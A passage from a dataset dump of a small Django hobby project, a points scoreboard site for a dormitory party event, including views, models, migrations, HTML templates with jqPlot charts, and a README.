input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n\n end_date = forms.DateTimeField(widget=forms.DateTimeInput, input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n class Meta:\n model = MarBar\n fields = ['title', 'info', 'start_date', 'end_date']\n\n def save(self, active_marbar):\n if self.is_valid():\n with transaction.atomic():\n new_event = Event(marbar=active_marbar, title=self.cleaned_data['title'],\n info=self.cleaned_data['info'], start_date=self.cleaned_data['start_date'],\n end_date=self.cleaned_data['end_date'])\n new_event.save()\n" }, { "alpha_fraction": 0.5214495658874512, "alphanum_fraction": 0.5275220274925232, "avg_line_length": 45.40909194946289, "blob_id": "c54ed71abcdf892d267b8f7480e918a6c80d67de", "content_id": "ff33f8ca4a6e9cfd7f9fdf7b03dfad3d1dc410c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 122, "num_lines": 110, "path": "/marbar/score_board/views.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import reverse\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import ScoreUnit\nfrom management.models import MarBar\nfrom django.http import JsonResponse\nimport json\nfrom django.contrib import messages\n\n\ndef help_order(d):\n xs = []\n for x in d:\n xs.append(x)\n return xs\n\ndef help_order_v2(d):\n xs = []\n for x in d:\n xs.append({'title': x.title, 'points': x.points})\n return xs\n\n\ndef score_board(request):\n try:\n active_marbar = MarBar.objects.get(is_active=True)\n all_data = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n return render(request, 'score_board.html',\n {'collum_0': help_order(all_data.filter(placement=0)),\n 'collum_1': help_order(all_data.filter(placement=1)),\n 'collum_2': help_order(all_data.filter(placement=2)),\n 'collum_3': help_order(all_data.filter(placement=3)),\n 'collum_4': help_order(all_data.filter(placement=4)),\n 'countdown_date': active_marbar.end_date})\n except:\n return render(request, 'score_board.html', {})\n\n\ndef get_points(request):\n active_marbar = MarBar.objects.get(is_active=True)\n all_data = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n return JsonResponse(help_order_v2(all_data), safe=False)\n\n\ndef get_graph(request):\n active_marbar = MarBar.objects.get(is_active=True)\n D = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n points = []\n labels = []\n for d in D:\n points.append(d.points)\n labels.append(d.title)\n fin = [a for a in zip(labels, points)]\n #return JsonResponse({'points': json.dumps(points), 'graph_labels': json.dumps(labels)}, safe=False)\n return JsonResponse({'points': json.dumps(fin)}, safe=False)\n\n\ndef assign_points(request):\n active_bar = MarBar.objects.filter(is_active=True)\n if active_bar.exists():\n active_bar = MarBar.objects.get(is_active=True)\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n if request.method == 'GET':\n all_data = ScoreUnit.objects.filter(marbar__pk=active_bar.pk).order_by('title')\n return render(request, 'assign_points.html',\n {'collum_0': all_data.filter(placement=0),\n 'collum_1': all_data.filter(placement=1),\n 'collum_2': all_data.filter(placement=2),\n 'collum_3': all_data.filter(placement=3),\n 'collum_4': all_data.filter(placement=4)})\n elif request.method == 'POST':\n try:\n su = ScoreUnit.objects.get(pk=int(request.POST.get('scoreUnitPk')))\n new_val = request.POST.get('scoreUnitValue')\n if new_val:\n if new_val[0] == '-':\n front_opr = -1\n new_val = new_val[1:]\n elif new_val[0] == '+':\n front_opr = 1\n new_val = new_val[1:]\n else:\n front_opr = 1\n if str.isdigit(new_val):\n new_score = su.points + (front_opr * int(new_val))\n if new_score < 0:\n new_score = 0\n su.points = new_score\n su.save()\n else:\n messages.add_message(request, messages.ERROR,\n 'The points field was not correctly filled and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n else:\n messages.add_message(request, messages.ERROR,\n 'The points field was not correctly filled and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n\n return redirect(reverse('score_board:assign_points'))\n except:\n messages.add_message(request, messages.ERROR, 'An error occurred and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n else:\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR,\n 'You must be logged in and connected to the Active MarBar to access this')\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR, 'There is no active MarBar at this time')\n return redirect(reverse('score_board'))\n" }, { "alpha_fraction": 0.7020033597946167, "alphanum_fraction": 0.7153589129447937, "avg_line_length": 45.07692337036133, "blob_id": "5a75d0f6663b608d64bcf55f5bf1a27af447cace", "content_id": "1baac8498c5a392d55098e128ccffe5adc0f7ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1198, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/marbar/marbar/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "\"\"\"marbar URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom score_board.views import score_board\n# from django.contrib.auth import views as auth_views #https://simpleisbetterthancomplex.com/tutorial/2016/06/27/how-to-use-djangos-built-in-login-system.html\n\nurlpatterns = [\n path('', score_board, name='score_board'),\n path(r'admin/', admin.site.urls),\n path(r'management/', include(('management.urls', 'management'), namespace='management')),\n path(r'score_board/', include(('score_board.urls', 'score_board'), namespace='score_board')),\n]\n" }, { "alpha_fraction": 0.554760217666626, "alphanum_fraction": 0.5583392977714539, "avg_line_length": 32.28571319580078, "blob_id": "7e02efb780daa3cce4654cd9ab0ff7e4b2547c64", "content_id": "df896bac628084f3762d74a598ec47867b31315b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 96, "num_lines": 42, "path": "/marbar/score_board/templates/base.html", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html lang=\"en\">\n{% load static %}\n<head>\n <meta charset=\"UTF-8\">\n <title>{% block title %}RHK MarBar{% endblock %}</title>\n <script type=\"text/javascript\" src=\"{% static \"jquery.js\" %}\"></script>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"base_style.css\" %}\" />\n {% block headers %}\n {% endblock %}\n</head>\n<body>\n{% if messages %}\n <ul id=\"message_box\">\n {% for message in messages %}\n <li {% if message.tags %} class=\"{{ message.tags }}\"{% endif %}>{{ message }}</li>\n {% endfor %}\n </ul>\n <script>\n setTimeout(function() {\n $(\"#message_box\").fadeOut().empty();\n }, 2500);\n </script>\n{% endif %}\n <ul id=\"nav_bar\">\n <li class=\"nav_bar_elem\"><a href={% url \"score_board\" %}>Score board</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"management:events\" %}>Events</a></li>\n {% if user.is_authenticated %}\n <li class=\"nav_bar_elem\"><a href={% url \"management:management_view\" %}>Management</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"score_board:assign_points\" %}>Add Points</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"management:logout\" %}>Log out</a></li>\n {% else %}\n <li class=\"nav_bar_elem\"><a href={% url \"management:login_view\" %}>Log in</a></li>\n {% endif %}\n\n</ul>\n<div id=\"main_content\">\n{% block content %}{% endblock %}\n</div>\n\n</body>\n</html>" }, { "alpha_fraction": 0.5524079203605652, "alphanum_fraction": 0.5694050788879395, "avg_line_length": 37.16216278076172, "blob_id": "b2a1d57058e6d60f7b4cbf77f289e825c3c36904", "content_id": "a272ba7782938bc466a60f5acb2091e070a0219c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 114, "num_lines": 37, "path": "/marbar/management/migrations/0001_initial.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.1 on 2018-10-26 15:02\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(default='', max_length=200)),\n ('info', models.TextField(default='', max_length=200)),\n ('start_date', models.DateTimeField(auto_now_add=True)),\n ('end_date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='MarBar',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(default='', max_length=200)),\n ('banner', models.ImageField(blank=True, upload_to='banners/', verbose_name='banner')),\n ('end_date', models.DateTimeField()),\n ('is_active', models.BooleanField(default=False)),\n ('user', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5371794700622559, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 25.89655113220215, "blob_id": "e1f9c2f3a1b095de5118431598859e3eb80874fe", "content_id": "e2b590b00d4589fd2d203317950d730d6d551c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 119, "num_lines": 29, "path": "/marbar/management/migrations/0003_auto_20190215_1354.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-02-15 13:54\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0002_auto_20190131_1745'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='marbar',\n field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='management.MarBar'),\n ),\n migrations.AlterField(\n model_name='event',\n name='end_date',\n field=models.DateTimeField(),\n ),\n migrations.AlterField(\n model_name='event',\n name='start_date',\n field=models.DateTimeField(),\n ),\n ]\n" }, { "alpha_fraction": 0.8202247023582458, "alphanum_fraction": 0.8202247023582458, "avg_line_length": 17, "blob_id": "002e3956d55be865c8ce547f5566b4507499f26e", "content_id": "7e9ae0b132a3af3f3b1b6f7132f06a2801db7fce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/marbar/management/admin.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import MarBar\n\n\nadmin.site.register(MarBar)" }, { "alpha_fraction": 0.4175538718700409, "alphanum_fraction": 0.4310568571090698, "avg_line_length": 35.8516731262207, "blob_id": "c5714420a62a6f733e378f767283829dffb34b97", "content_id": "4183976836b9ab9617b5f0e0844b8eb7ad00aceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 7702, "license_type": "no_license", "max_line_length": 114, "num_lines": 209, "path": "/marbar/score_board/templates/score_board.html", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% load static %}\n\n{% block headers %}\n\n\n <script type=\"text/javascript\" src=\"{% static \"jqplot/jquery.jqplot.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.barRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.categoryAxisRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.canvasAxisLabelRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.canvasAxisTickRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.pointLabels.js\" %}\"></script>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"jqplot/jquery.jqplot.css\" %}\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"scoreboard_style.css\" %}\" />\n\n{% endblock %}\n\n{% block content %}\n\n <div class=\"outer_layer\">\n <div class=\"column\" id=\"col_1\">\n {% if collum_1 %}\n <ul class=\"column_element\">\n {% for participant in collum_1 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n <div class=\"column\">\n <div class=\"col-sm-1\" id=\"col_2\">\n {% if collum_2 %}\n <ul class=\"column_element\">\n {% for participant in collum_2 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n </div>\n\n <div id=\"middle_section\">\n <div id=\"banner_outer\">\n <img src=\"{% static \"media/banners/test_image.png\" %}\" alt=\"my image\" id=\"banner_inner\">\n </div>\n <div>\n <h1 id=\"countdownClock\"></h1>\n </div>\n <div id=\"mainGraph\">\n </div>\n\n\n {% if collum_0 %}\n <div id=\"col_0_id\">\n <ul>\n {% for participant in collum_0 %}\n <div class=\"column_element col_0_class\">\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n </div>\n {% endfor %}\n </ul>\n </div>\n {% else %}\n <div class=\"col-sm-4\">\n <p>No polls are available.</p>\n </div>\n {% endif %}\n </div>\n\n <div class=\"column\" id=\"col_3\">\n {% if collum_3 %}\n <ul class=\"column_element\">\n {% for participant in collum_3 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n <div class=\"column\" id=\"col_4\">\n {% if collum_4 %}\n <ul class=\"column_element\">\n {% for participant in collum_4 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n </div>\n\n <script id=\"source\" language=\"javascript\" type=\"text/javascript\">\n $.ajaxSetup({cache: false});\n $( document ).ready(function() {\n update_score();\n update_plot();\n countdownClock();\n $.ajaxSetup({ cache: true });\n });\n\n function update_score() {\n $.ajax({\n url: \"{% url 'score_board:get_points' %}\",\n data: \"\",\n dataType: 'json',\n success: function(res_var) {\n res_var.forEach(function(res_item) {\n document.getElementById(res_item[\"title\"]).innerHTML = res_item[\"points\"];\n }\n );\n }\n }\n );\n }\n setInterval(update_score, 500);\n\n function update_plot() {\n $.ajax({\n url: \"{% url 'score_board:get_graph' %}\",\n data: \"\",\n dataType: 'json',\n success: function(res_var) {\n var s1 = JSON.parse(res_var.points);\n //var ticks = JSON.parse(res_var.graph_labels);\n\n $.jqplot.config.enablePlugins = true;\n\n\n plot1 = $.jqplot('mainGraph', [s1], {\n series:[{renderer:$.jqplot.BarRenderer}],\n axes: {\n xaxis: {\n renderer: $.jqplot.CategoryAxisRenderer,\n label: 'Warranty Concern',\n labelRenderer: $.jqplot.CanvasAxisLabelRenderer,\n tickRenderer: $.jqplot.CanvasAxisTickRenderer,\n tickOptions: {\n angle: -30,\n fontFamily: 'Courier New',\n fontSize: '9pt'\n }\n\n },\n yaxis: {\n label: 'Occurance',\n labelRenderer: $.jqplot.CanvasAxisLabelRenderer\n }\n }\n });\n }\n }\n );\n }\n setInterval(update_plot, 50000);\n\n function countdownClock() {\n // from: https://www.w3schools.com/howto/howto_js_countdown.asp\n\n var countDownDate = new Date(\"{{ countdown_date.year }}\", \"{{ countdown_date.month }}\" -1,\n \"{{ countdown_date.day }}\", \"{{ countdown_date.hour }}\", \"{{ countdown_date.minute }}\",\n \"{{ countdown_date.second }}\");\n\n // Update the count down every 1 second\n var x = setInterval(function() {\n\n // Get todays date and time\n var now = new Date().getTime();\n\n // Find the distance between now and the count down date\n var distance = countDownDate - now;\n\n // Time calculations for days, hours, minutes and seconds\n var days = Math.floor(distance / (1000 * 60 * 60 * 24));\n var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));\n var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));\n var seconds = Math.floor((distance % (1000 * 60)) / 1000);\n\n // Display the result in the element with id=\"demo\"\n document.getElementById(\"countdownClock\").innerHTML = days + \"d \" + hours + \"h \"\n + minutes + \"m \" + seconds + \"s \";\n\n // If the count down is finished, write some text\n if (distance < 0) {\n clearInterval(x);\n document.getElementById(\"countdownClock\").innerHTML = \"Too Easy!\";\n }\n }, 1000);\n }\n\n\n\n </script>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.7890700101852417, "alphanum_fraction": 0.7890700101852417, "avg_line_length": 48.66666793823242, "blob_id": "2434d1525b37b30cdb064181c30cce485f59be82", "content_id": "56d2ce2a53e5bf55892cb0780eaafefedc21a37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 141, "num_lines": 21, "path": "/README.md", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# marbar\nPoint system for MarBar (dormatory party thing)\nA lot of polishing is still needed for this site\n\n\nA simple site for keeping track of points\n\nthe front page features scores for the active \"marbar\" along with a graph of the points and a time tracker of how long the \"marbar\" have left\nthe management site allos a superuser to add new users as well as creating new marbars (only one can be active at any time)\nthe event page features events connected to the active marbar\nthe add_points page is for adding points to the units connected to the active marbar\n\na user can be either a superuser (unlimited acess to everything) or a normal user (created by a superuser, \ncan manage and assigne events and points to marbar's it is connected to)\nno login is required for the front page and the event page.\n\n\nToDo:\nThe graph is not working when trying to employ the \"tick\" rendering options of \"jqplot\"\nThe picture for the front page needs to be able to be changed from the management page\nThe styling of the page obviously needs a lot of work\n" }, { "alpha_fraction": 0.682170569896698, "alphanum_fraction": 0.682170569896698, "avg_line_length": 27.77777862548828, "blob_id": "c947f32ecc7594feb3aae692b329c789b81b5aba", "content_id": "abd23975f539f6ed827ade903118dca971b01d46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 70, "num_lines": 9, "path": "/marbar/score_board/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('get_points', views.get_points, name='get_points'),\n path('get_graph', views.get_graph, name='get_graph'),\n path('assign_points/', views.assign_points, name='assign_points'),\n]" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7071005702018738, "avg_line_length": 29.727272033691406, "blob_id": "d0426956430cd6a4c8f0332981703380873180d0", "content_id": "a82d1c69d5e4673c4df75b8f04c1d2b81b4389c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/marbar/score_board/models.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass ScoreUnit(models.Model):\n title = models.CharField(max_length=200, default=\"\")\n points = models.IntegerField(default=0)\n placement = models.IntegerField(default=0)\n marbar = models.ForeignKey('management.MarBar', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n" }, { "alpha_fraction": 0.6712802648544312, "alphanum_fraction": 0.6816608905792236, "avg_line_length": 33.68000030517578, "blob_id": "660837ba8f7a567898463dfca1ea0bfa3fd1da9e", "content_id": "ac9550a2b7cecc1a7ca8ecb88d286e7ea4aafb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/marbar/management/models.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass MarBar(models.Model):\n title = models.CharField(max_length=200, default=\"\", unique=True)\n banner = models.ImageField(upload_to='banners/',\n verbose_name='banner', blank=True)\n users = models.ManyToManyField(User)\n end_date = models.DateTimeField(blank=False)\n is_active = models.BooleanField(default=False, blank=False)\n\n def __str__(self):\n return self.title\n\n\nclass Event(models.Model):\n marbar = models.ForeignKey(MarBar, on_delete=models.CASCADE, default=None)\n title = models.CharField(max_length=200, default=\"\")\n info = models.TextField(max_length=200, default=\"\")\n start_date = models.DateTimeField(blank=False)\n end_date = models.DateTimeField(blank=False)\n\n def __str__(self):\n return self.title\n" }, { "alpha_fraction": 0.5092936754226685, "alphanum_fraction": 0.5501858592033386, "avg_line_length": 22.39130401611328, "blob_id": "0f72087ac9b16051be2a3e0c86fcab87de93ed6e", "content_id": "6d274cc586a1b6b5e84117f8c671fb68b1f3561d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/marbar/management/migrations/0002_auto_20190131_1745.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-31 17:45\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='marbar',\n old_name='user',\n new_name='users',\n ),\n migrations.AlterField(\n model_name='marbar',\n name='title',\n field=models.CharField(default='', max_length=200, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 13, "blob_id": "7308605249e938385da9d8e8d5c45ddd2fdf4b78", "content_id": "2d9bfc1049cdee3bcb395682977b79d7571e40a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 28, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/requirements.txt", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "django>=2.1.5\nPillow==5.3.0\n" }, { "alpha_fraction": 0.6357301473617554, "alphanum_fraction": 0.6359321475028992, "avg_line_length": 46.83091735839844, "blob_id": "52c9f9a539a65eea7e67ac33b89cf2adfc71af47", "content_id": "d687f11764c28c5acae48e0df79471b71fd7fa25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9902, "license_type": "no_license", "max_line_length": 120, "num_lines": 207, "path": "/marbar/management/views.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom .models import MarBar, Event\nfrom .forms import MarBarForm, EventForm\nfrom score_board.models import ScoreUnit\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\n\n\ndef general_management(request):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n else:\n response_context = {}\n if request.user.is_superuser:\n response_context['superuser'] = True\n response_context['createUser'] = UserCreationForm\n\n marbar_form = MarBarForm()\n response_context['createMarBar'] = marbar_form\n marbars = MarBar.objects.all()\n else:\n response_context['superuser'] = False\n marbars = MarBar.objects.filter(users__in=[request.user])\n\n t = [{'title': m.title, 'pk': m.pk,\n 'form': MarBarForm({'title': m.title, 'users': m.users, 'end_date': m.end_date, 'intended_pk': m.pk})}\n for m in marbars]\n\n response_context['manageMarbars'] = t\n return render(request, 'manage_marbar.html', response_context)\n\n\n\ndef crude_login_view(request):\n return render(request, \"login.html\")\n\n\ndef crude_login(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR, 'Either username or password were incorrect')\n return redirect(reverse('management:login_view'))\n\n\ndef logout_user(request):\n logout(request)\n return redirect(reverse('score_board'))\n\n\ndef create_marbar(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = MarBarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save(new_instance=True)\n messages.add_message(request, messages.INFO, 'MarBar was successfully created')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Please recheck that the form is filled as intended\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef create_user(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.INFO, 'User was successfully created')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"The user input did not fulfill with the requirements\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef update_marbar(request):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = MarBarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save(new_instance=False, update_instance=True)\n messages.add_message(request, messages.INFO, 'MarBar was successfully updated')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Please recheck that the form is filled as intended\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef activate_marbar(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n if 'activateMarBar' in request.POST:\n activation_pk = int(request.POST.get('activateMarBar'))\n try:\n m = MarBar.objects.get(pk=activation_pk)\n if not m.is_active:\n with transaction.atomic():\n if MarBar.objects.filter(is_active=True).exists():\n old_active = MarBar.objects.get(is_active=True)\n old_active.is_active = False\n old_active.save()\n m.is_active = True\n m.save()\n messages.add_message(request, messages.INFO, '{} is now the active MarBar'.format(m.title))\n else:\n messages.add_message(request, messages.INFO, 'This MarBar is already active')\n except ObjectDoesNotExist:\n messages.add_message(request, messages.WARNING, 'An error occurred, please try again')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Refresh the page or contact someone that has coded this\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef events_view(request):\n active_bar = MarBar.objects.filter(is_active=True)\n if active_bar.exists() and active_bar.count() == 1:\n active_bar = MarBar.objects.get(is_active=True)\n if request.method == 'GET':\n response_context = {}\n events = Event.objects.filter(marbar=active_bar).order_by('start_date')\n if events.exists():\n response_context = {'current_events': [e for e in events]}\n\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n response_context['event_form'] = EventForm()\n return render(request, 'events.html', response_context)\n\n elif request.method == 'POST':\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n new_event = EventForm(request.POST)\n if new_event.is_valid():\n new_event.save(active_marbar=active_bar)\n messages.add_message(request, messages.INFO, 'Event was successfully created')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.WARNING, 'Please recheck the information filled in the from')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.WARNING, 'Please log in again to access this functionality')\n return redirect(reverse('management:login'))\n\n else:\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR, 'There is currently no active MarBar')\n return redirect(reverse('score_board'))\n\n\ndef delete_event(request):\n active_bar = MarBar.objects.filter(is_active=True)\n\n if active_bar.exists() and active_bar.count() == 1:\n active_bar = MarBar.objects.get(is_active=True)\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n if request.method == 'POST':\n try:\n e = Event.objects.get(pk=int(request.POST.get('event_pk')), marbar=active_bar)\n e.delete()\n messages.add_message(request, messages.INFO, 'The event was deleted')\n return redirect(reverse('management:events'))\n except:\n messages.add_message(request, messages.ERROR, 'Refresh the page and try again')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.ERROR, 'Stop fooling around!')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.INFO, 'plz log in to access this functionality')\n return redirect(reverse('management:login_view'))\n messages.add_message(request, messages.ERROR, 'There is currently no active MarBar')\n return redirect(reverse('score_board'))\n\n" } ]
17
badalraina31/DeepCT
https://github.com/badalraina31/DeepCT
c2e5719bb3bdec9aacb2214b4960b13ed9f9d37d
2af5b42ca79d3b42ffdc21877ee57097a19b2913
2549a1f0fa59f858f7b2f06c215223a862126a8f
refs/heads/master
2022-04-16T05:39:31.582987
2020-03-14T16:42:16
2020-03-14T16:42:16
null
0
0
